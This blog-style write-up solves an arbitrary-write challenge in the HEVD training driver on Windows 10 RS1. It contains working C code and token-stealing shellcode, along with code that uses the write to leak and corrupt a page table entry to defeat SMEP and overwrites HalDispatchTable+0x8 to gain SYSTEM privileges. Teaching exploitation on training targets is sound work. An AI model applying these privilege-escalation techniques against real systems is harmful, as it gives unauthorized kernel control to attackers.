HEVD - Arbitrary Write Windows 10 RS1
Exploiting Arbitrary Write
Intro
Recently I have taken an interest in Windows kernel exploitation and I came across this github repo. This repo covers many different kind of exploitation technics in the Windows kernel. This write up and the following to come is on solving some of the challengs in this project. A big thanks for the creators of this project.
As the headline states, this write up will be about exploiting an Arbitrary Write.
Communicating with the driver
To start with, we need to find the symbolic link in order to talk to the device object of the driver. Looking at winobj
from Sysinternals, we can see the following record-
Next we will take a look at IDA in otrder to find the IOCTL
code we need in order to trigger the arbitrary write handler.
The value of the IOCTL
is 0x0022200B
.
Code Overview
Let’s start by looking at ArbitraryWrite.c
, we have a function called - TriggerArbitraryWrite
that takes one argument,
NTSTATUS
TriggerArbitraryWrite(
_In_ PWRITE_WHAT_WHERE UserWriteWhatWhere
)
if we take a look at ArbitraryWrite.h
header file, we can see the following struct -
typedef struct _WRITE_WHAT_WHERE
{
PULONG_PTR What;
PULONG_PTR Where;
} WRITE_WHAT_WHERE, *PWRITE_WHAT_WHERE;
It consist out of two pointers, What
and Where
.
The What
pointer will store the address of the data that we want to write, and the Where
pointer will point to the address in memory where we want to write our data into.
The rest of the function looks like this-
We can see a call to ProbeForRead
which verifies that the UserWriteWhatWhere
buffer actually resides in the user portion of the address space, and is correctly aligned.
Then, we see *v2 = *v1
which Basically does the action of copying the data.
Analysing The Vulnerability
After we overviewed the code let’s understand where and why this code is vulnerable. As the comment inside the code states:
This is a vanilla Arbitrary Memory Overwrite vulnerability because the developer is writing the value pointed by ‘What’ to memory location pointed by ‘Where’ without properly validating if the values pointed by ‘Where’ and ‘What’ resides in User mode.
Exploiting The Vulnerability
So, we have reviewed the code, understood the vulnerability, and it’s time to write our exploit. We are going to write the exploit for Windows 10 x64 RS1
, the reason I chose this version is the fact that each new RS Microsoft added more mitigations that made it hard for us to develop kernel exploits.
Starting from RS2 Microsoft introduced kCFG
which stands for “Kernel Control Flow Guard”, this mitigation validate all the call
instructions and makes sure the memory location in which the function residence is legitimate.
We wont get into how to bypass kCFG
here, but I will say it’s possible, and hopefully on the next write up we will be facing a higher RS version.
In this write up we are going to deal with the following mitigations -
- kASLR (Kernel Address Space Layout Randomization).
- Page Table Randomization.
- NX (No Execute).
- SMEP (Supervisor Mode Access Prevention).
The steps we are going to do is as follows:
- Write a shellcode that will steal the system access token and set it to our process.
- Allocate
rwx
memory region in user mode for our shellcode. - Changing the
U/S
bit of thePTE
in which our shellcode was allocated. - Modify one of the pointers inside
HalDispatchTable
to point to our user mode shell code. - Call a syscall to trigger the use of
HalDispatchTable
which will then execute our shellcode as kernel.
Don’t worry if you don’t understand any of the steps, they will be explained later on.
Shellcode
I am going to use a common generic shellcode that will copy the system access token to our process.
[BITS 64]
_start:
mov rax, [gs:0x188] ; Current thread (_KTHREAD)
mov rax, [rax + 0xb8] ; Current process (_EPROCESS)
mov rbx, rax ; Copy current process (_EPROCESS) to rbx
__loop:
mov rbx, [rbx + 0x2e8] ; ActiveProcessLinks
sub rbx, 0x2e8 ; Go back to current process (_EPROCESS)
mov rcx, [rbx + 0x2e0] ; UniqueProcessId (PID)
cmp rcx, 4 ; Compare PID to SYSTEM PID
jnz __loop ; Loop until SYSTEM PID is found
mov rcx, [rbx + 0x358] ; SYSTEM token is @ offset _EPROCESS + 0x358
and cl, 0xf0 ; Clear out _EX_FAST_REF RefCnt
mov [rax + 0x358], rcx ; Copy SYSTEM token to current process
xor rax, rax ; STATUS_SUCCESS
ret ; Done!
char payload[] = "\x65\x48\x8B\x04\x25\x88\x01\x00\x00"
"\x48\x8B\x80\xB8\x00\x00\x00"
"\x48\x89\xC3\x48\x8B\x9B\xF0\x02\x00\x00"
"\x48\x81\xEB\xF0\x02\x00\x00"
"\x48\x8B\x8B\xE8\x02\x00\x00"
"\x48\x83\xF9\x04\x75\xE5"
"\x48\x8B\x8B\x58\x03\x00\x00"
"\x80\xE1\xF0\x48\x89\x88\x58\x03\x00\x00"
"\x48\x31\xC0\xC3";
Allocating rwx memory in user mode
Here we allocate a rwx
memory region for our shellcode.
void* shellcode = VirtualAlloc(
NULL, // Address.
sizeof(payload), // Size.
0x3000, // Allocation Type.
0x40 // Protection.
);
// Moving memory into allocated space in user mode.
RtlMoveMemory(
shellcode,
payload,
sizeof(payload)
);
Changing U/S bit of the PTE
Remember I said that the kernel is going to execute our code from a memory region in user mode? Well, in order to do so we need to bypass SMEP.
What is SMEP?
SMEP or Supervisor Mode Access Prevention, is a CPU feature that will cause a “Bug Check” to occur with the following error message - ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY
, whenever the CPU will try to access a memory region in user mode with CPL=0
while the right CPL(Current Privilege Level) should be CPL=3
.
We can see if SMEP is enabled by looking at the 20th bit in cr4
-
In this case, it’s the 1
at the start.
As documented in Intel’s manual 3A sections 2.5 (CR4.SMEP flag) and 4.6 (per memory page settings).
So, when SMEP is enabled the CPU will check the U/S
flag of the page and if it’s value is equals to 0
the CPU will allow execution of the code with CPL=0
, Notice that SMEP is per page.
in other words, the kernel will be able to run the code although it resides in user mode.
Alright, after we cleared what SMEP is, it’s time to get our hands dirty and understand how to change the U/S
flag of the PTE. I am assuming you know what is a PTE and how paging works, so I wont get into that.
In order to modify the control flag of the PTE we first need to find the address of the PTE in memory. Remember that the base address from which we can start calculating the address is being randomized each time the OS reboots, so we need to find a way to dynamically know what is the base address.
nt!MiGetPteAddress
Quoting from “Connor McGarr” blog (Link bellow) -
Windows has an API called
nt!MiGetPteAddress
that performs a specific formula to retrieve the associated PTE of a memory page.
The above function performs the following instructions:
- Bitwise shifts the contents of the RCX register to the right by 9 bits.
- Moves the value of
0x7FFFFFFFF8
into RAX.- Bitwise AND’s the values of RCX and RAX together.
- Moves the value of
0FFFF818000000000
into RAX.- Adds the values of RAX and RCX.
- Performs a return out of the function.
0FFFF818000000000
is a 64-bit address which is actually the base of the PTEs.
You probably ask yourself, but how does it helps us?
The nice thing about “Write What Where” is that it can be used as an arbitrary read as well ;)
We can find the offset of this function in kernel and read the base address which can be found at offset nt!MiGetPteAddress+0x13
and this is how we will be able to dynamically calculate the page address and change the U/S
flag.
The offset of nt!MiGetPteAddress
in Windows 10 RS1 is at kernel_base_address + 0x51214
.
Time to write some code
Let’s do it with code(The following code snippets are highly inspired by Connor’s blog with a little cosmetics changes of mine) -
We will start by getting the address of “ntoskernel” -
unsigned long long getKernelBaseAddress() {
void* lpImageBase[1024];
unsigned long lpcbNeeded;
int baseOfDrivers = EnumDeviceDrivers(
lpImageBase,
sizeof(lpImageBase),
&lpcbNeeded
);
if (!baseOfDrivers)
{
LOG("[-] Error! Unable to invoke EnumDeviceDrivers(). Error: %d\n", GetLastError());
exit(1);
}
// ntoskrnl.exe is the first module dumped in the array.
unsigned long long kernelBaseAddress = (unsigned long long)lpImageBase[0];
LOG("[+] ntoskrnl.exe is located at: 0x%llx\n", kernelBaseAddress);
return kernelBaseAddress;
}
Then, we will be getting the PTEs base address -
unsigned long long getBasePteAddress(HANDLE hDriver, unsigned long long kernelBaseAddress) {
unsigned long long NtMiGetPteAddress = kernelBaseAddress + MI_PTE_GET_ADDRESS_OFFSET;
// Defining a pointer to write the base of PTEs to. (must initialize pointer, hence placeholder).
unsigned long long pteBaseAddressPlaceHolder = 0;
PULONGLONG baseOfPtes = &pteBaseAddressPlaceHolder;
// Defining buffer to send to driver
char buffer[0x10];
size_t oneQword = 0x8;
// Initializing buffer to junk to satisfy type error of memset.
memset(buffer, 0x41, 0x10);
// Actual buffer for extracting the PTE base.
memcpy(buffer, &NtMiGetPteAddress, oneQword);
memcpy(&buffer[0x8], &baseOfPtes, oneQword);
sendBufferToDriver(hDriver, buffer);
LOG("[+] Base of the page table entries: 0x%llx\n", (unsigned long long) * baseOfPtes)
return (unsigned long long) * baseOfPtes;
}
Now, let’s find the shellcode PTE -
unsigned long long getShellcodePTEAddress(unsigned long long baseOfPtes, void* shellcodeAddress) {
// Bitwise operations to locate PTE of shellcode page
unsigned long long shellcodePte = (unsigned long long)shellcodeAddress >> 9;
shellcodePte = shellcodePte & 0x7FFFFFFFF8;
return shellcodePte + baseOfPtes;
}
Calculate the address of the Control Flags where the U/S
bit can be found -
unsigned long long getShellcodePteControlFlagAddress(HANDLE hDriver, unsigned long long shellcodePte) {
// Defining a pointer to extract shellcode's PTE control bits. (must initialize pointer, hence placeholder).
unsigned long long placeholder = 0;
PULONGLONG pteControlFlagsPointer = &placeholder;
// Defining buffer to send to driver.
char buffer[0x10];
size_t oneQword = 0x8;
// Initializing buffer to junk to satisfy type error of memset
memset(buffer, 0x41, 0x10);
// Actual buffer for extracting PTE control bits
memcpy(buffer, &shellcodePte, oneQword);
memcpy(&buffer[0x8], &pteControlFlagsPointer, oneQword);
sendBufferToDriver(hDriver, buffer);
LOG("[+] PTE control bits for shellcode page: %p\n", (unsigned long long) * pteControlFlagsPointer);
return (unsigned long long) * pteControlFlagsPointer;
}
Lastly, let’s change the U/S
flag -
void changeUSFlag(HANDLE hDriver, unsigned long long pteControlFlags , unsigned long long shellcodePte) {
// Corrupting U/S bit in PTE to make user mode page become kernel mode.
unsigned long long taintedPte;
taintedPte = pteControlFlags & 0xFFFFFFFFFFFFFFFB;
// Defining pointer for corrupted PTE bits.
PULONGLONG taintedptePointer = &taintedPte;
// Defining buffer to send to driver.
char buffer[0x10];
size_t oneQword = 0x8;
// Initializing buffer to junk to satisfy type error of memset.
memset(buffer, 0x41, 0x10);
// Actual buffer for corrupting PTE.
memcpy(buffer, &taintedptePointer, oneQword);
memcpy(&buffer[0x8], &shellcodePte, oneQword);
// Print update for corrupting PTE
LOG("[+] Corrupting PTE of shellcode to make U/S bit kernel mode...\n");
sendBufferToDriver(hDriver, buffer);
}
So, at this point we can say “good bye” to SMEP and continue into modifying the pointer inside HalDispatchTable
.
Modifying HalDispatchTable
From “Geoff Chappell” -
The HAL_DISPATCH structure is a table of pointers to optional HAL functionality. The kernel keeps the one instance of this table. It’s in the kernel’s read-write data section and its address is exported as HalDispatchTable. The table initially has the kernel’s built-in implementations of most (but not all) functions. Many are trivial. Some are substantial. The HAL overrides some. No known HAL overrides all. Functionality that has no meaning to a particular HAL is left to the kernel’s default (and HAL programmers are spared from writing even dummy code for nothing that matters to them). Moreover, since the address is exported, rather than communicated specifically to the HAL, it seems to have been intended all along that the functionality is exposed to other kernel-mode modules such as drivers not only for them to call but also to override further.
What we are going to do is, overwrite one of the pointers and then make a syscall the will trigger the execution of the function to which the pointer points.
In order to modify the HalDispatchTable
we first need to find ntoskernel
base address, just as we did last part. After we have the base address we need to know what is the offset of HalDispatchTable
, in Windows 10 RS1 the offset is 0x2f43b8
.
Now we will replace the pointer at offset HalDispatchTable+0x8
. Why?
The answer can be found on the disassembly of nt!NtQueryIntervalProfile
Syscall -
kd> uf nt!NtQueryIntervalProfile
nt!NtQueryIntervalProfile:
fffff800`96584df0 48895c2408 mov qword ptr [rsp+8],rbx
fffff800`96584df5 57 push rdi
fffff800`96584df6 4883ec20 sub rsp,20h
fffff800`96584dfa 488bda mov rbx,rdx
fffff800`96584dfd 65488b042588010000 mov rax,qword ptr gs:[188h]
fffff800`96584e06 408ab832020000 mov dil,byte ptr [rax+232h]
fffff800`96584e0d 4084ff test dil,dil
fffff800`96584e10 7419 je nt!NtQueryIntervalProfile+0x3b (fffff800`96584e2b) Branch nt!NtQueryIntervalProfile+0x22:
fffff800`96584e12 48b80000ffffff7f0000 mov rax,7FFFFFFF0000h
fffff800`96584e1c 483bd0 cmp rdx,rax
fffff800`96584e1f 480f43d0 cmovae rdx,rax
fffff800`96584e23 8b02 mov eax,dword ptr [rdx]
fffff800`96584e25 8902 mov dword ptr [rdx],eax
fffff800`96584e27 eb02 jmp nt!NtQueryIntervalProfile+0x3b (fffff800`96584e2b) Branch nt!NtQueryIntervalProfile+0x3b:
fffff800`96584e2b e81c000000 call nt!KeQueryIntervalProfile (fffff800`96584e4c)
fffff800`96584e30 4084ff test dil,dil
fffff800`96584e33 7411 je nt!NtQueryIntervalProfile+0x56 (fffff800`96584e46) Branch nt!NtQueryIntervalProfile+0x45:
fffff800`96584e35 8903 mov dword ptr [rbx],eax
fffff800`96584e37 eb00 jmp nt!NtQueryIntervalProfile+0x49 (fffff800`96584e39) Branch nt!NtQueryIntervalProfile+0x49:
fffff800`96584e39 33c0 xor eax,eax
fffff800`96584e3b 488b5c2430 mov rbx,qword ptr [rsp+30h]
fffff800`96584e40 4883c420 add rsp,20h
fffff800`96584e44 5f pop rdi
fffff800`96584e45 c3 ret
nt!NtQueryIntervalProfile+0x56:
fffff800`96584e46 8903 mov dword ptr [rbx],eax
fffff800`96584e48 ebef jmp nt!NtQueryIntervalProfile+0x49 (fffff800`96584e39) Branch
Inside that function we can see a call is being made to nt!KeQueryIntervalProfile
-
kd> uf nt!KeQueryIntervalProfile
nt!KeQueryIntervalProfile:
fffff800`96584e4c 4883ec48 sub rsp,48h
fffff800`96584e50 83f901 cmp ecx,1
fffff800`96584e53 7430 je nt!KeQueryIntervalProfile+0x39 (fffff800`96584e85) Branch nt!KeQueryIntervalProfile+0x9:
fffff800`96584e55 ba18000000 mov edx,18h
fffff800`96584e5a 894c2420 mov dword ptr [rsp+20h],ecx
fffff800`96584e5e 4c8d4c2450 lea r9,[rsp+50h]
fffff800`96584e63 4c8d442420 lea r8,[rsp+20h]
fffff800`96584e68 8d4ae9 lea ecx,[rdx-17h]
fffff800`96584e6b ff15c714deff call qword ptr [nt!HalDispatchTable+0x8 (fffff800`96366338)]
fffff800`96584e71 85c0 test eax,eax
fffff800`96584e73 7818 js nt!KeQueryIntervalProfile+0x41 (fffff800`96584e8d) Branch nt!KeQueryIntervalProfile+0x29:
fffff800`96584e75 807c242400 cmp byte ptr [rsp+24h],0
fffff800`96584e7a 7411 je nt!KeQueryIntervalProfile+0x41 (fffff800`96584e8d) Branch nt!KeQueryIntervalProfile+0x30:
fffff800`96584e7c 8b442428 mov eax,dword ptr [rsp+28h]
nt!KeQueryIntervalProfile+0x34:
fffff800`96584e80 4883c448 add rsp,48h
fffff800`96584e84 c3 ret
nt!KeQueryIntervalProfile+0x39:
fffff800`96584e85 8b0595c2dfff mov eax,dword ptr [nt!KiProfileAlignmentFixupInterval (fffff800`96381120)]
fffff800`96584e8b ebf3 jmp nt!KeQueryIntervalProfile+0x34 (fffff800`96584e80) Branch nt!KeQueryIntervalProfile+0x41:
fffff800`96584e8d 33c0 xor eax,eax
fffff800`96584e8f ebef jmp nt!KeQueryIntervalProfile+0x34 (fffff800`96584e80) Branch
Here, we can see a call to HalDispatchTable+0x8
. There we will put our pointer.
It’s time to write the final part of the exploit -
void modifyHalDispatchTable(unsigned long long kernelBaseAddress, HANDLE hDriver, void* shellcode) {
unsigned long long halDispatchTable = kernelBaseAddress + HAL_DISPATCH_TABLE_OFFSET;
// Defining buffer to send to driver.
char buffer[0x10];
size_t oneQword = 0x8;
// Initializing buffer to junk to satisfy type error of memset.
memset(buffer, 0x41, 0x10);
// Actual buffer for overwriting [nt!HalDispatchTable+0x8] with shellcode address.
memcpy(buffer, &shellcode, oneQword);
memcpy(&buffer[0x8], &halDispatchTable, oneQword);
sendBufferToDriver(hDriver, buffer);
printf("[+] Overwrote [nt!HalDispatchTable+0x8] with shellcode address...\n");
}
In the above, we are modifying the HalDispatchTable
with a pointer to our shellcode.
void triggerExploit() {
// Locating nt!NtQueryIntervalProfile.
NtQueryIntervalProfile_t NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(
GetModuleHandle(
TEXT("ntdll.dll")),
"NtQueryIntervalProfile"
);
// Error handling.
if (!NtQueryIntervalProfile)
{
printf("[-] Error! Unable to find ntdll!NtQueryIntervalProfile! Error: %d\n", GetLastError());
exit(1);
}
// Print update for found ntdll!NtQueryIntervalProfile.
printf("[+] Located ntdll!NtQueryIntervalProfile at: 0x%llx\n", NtQueryIntervalProfile);
// Invoking nt!NtQueryIntervalProfile to execute [nt!HalDispatchTable+0x8]
printf("[+] Calling nt!NtQueryIntervalProfile to execute [nt!HalDispatchTable+0x8]...\n");
// Calling nt!NtQueryIntervalProfile.
ULONG exploit = 0;
NtQueryIntervalProfile(
0x1234,
&exploit
);
}
That’s it, our process is now running with a system token!
Wrapping up
In this write up we saw how to exploit an arbitrary “Write What Where” in Windows kernel. As I have said in the above, there are many different mitigations in Windows 10 latest versions and it gets even harder when VBS is in place. Here I have showed how to bypass some of the mitigations like SMEP and Page Table Randomization. There are more ways to bypass those mitigations other than what I have showed.